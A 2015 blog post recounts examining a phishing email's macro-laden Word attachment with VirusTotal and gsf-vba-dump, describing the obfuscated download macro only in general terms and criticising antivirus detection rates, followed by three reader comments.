Pages

Monday 2 November 2015

Malware examination

Hi
Please confirm receipt of order
Kind regards
Margaret


 -----------------------------
This email and any attachments are believed to be virus free, however
recipients are responsible for appropriate virus checks. The email and
attachments are confidential to the addressee and unauthorised use, copying or
retention by others is prohibited.

-----------------------------


Enclosed was PORDER.DOC. I uploaded it to Virustotal, three out of 55 products flagged it as malware. But now I have some tools for examining such things - time to deploy!

By the way, " This email and any attachments are believed to be virus free" is a nice touch. I really can't imagine why anyone puts that into an email. "I'm a good guy" isn't convincing to me, and it shouldn't be to anyone else.

I'm using gsf-vba-dump. To get a copy, if you're running Linux, do "yum install libgsf-devel". What it does, is peer inside Word documents (and suchlike) and display any macros. And that's what it did - 1000 lines of macro code!

Back in 1995, when the first Word macro virus (winword.concept) appeared, there was nothing like this available. We wanted to be able to scan inside a DOC file, so we asked Microsoft for the file format. After a few months of effort trying to get the file format, we eventually accepted that not even Microsoft knew how it worked. They had no specification for the file format of their own product! We had to wing it, and wing it we did. I think we determined the file format before MS did.

Now they have got a specification for the file format, and that's how gsf-vba-dump was written.

So I was able to read the macros in the file. Unfortunately, they're written in Visual Basic, not a language I'm familiar with (I wrote a program in it once, and that convinced me).
I can see where the macros use http to request something from a remote server, and I'm guessing that what it downloads is the malware that does the business.

I can also see that the macro is obfuscated - there's stuff that it's trying to conceal.

52 out of 55 products pass it as clean. Do NOT base your anti-malware strategy on these products.

3 comments:

  1. This very one was aimed at me too.
    Gmail refused to import it.

    ReplyDelete
  2. Good for gmail!

    But many people don't use gmail, and might be relying on their antivirus.

    ReplyDelete
  3. Bad strategy, as your tests show.

    ReplyDelete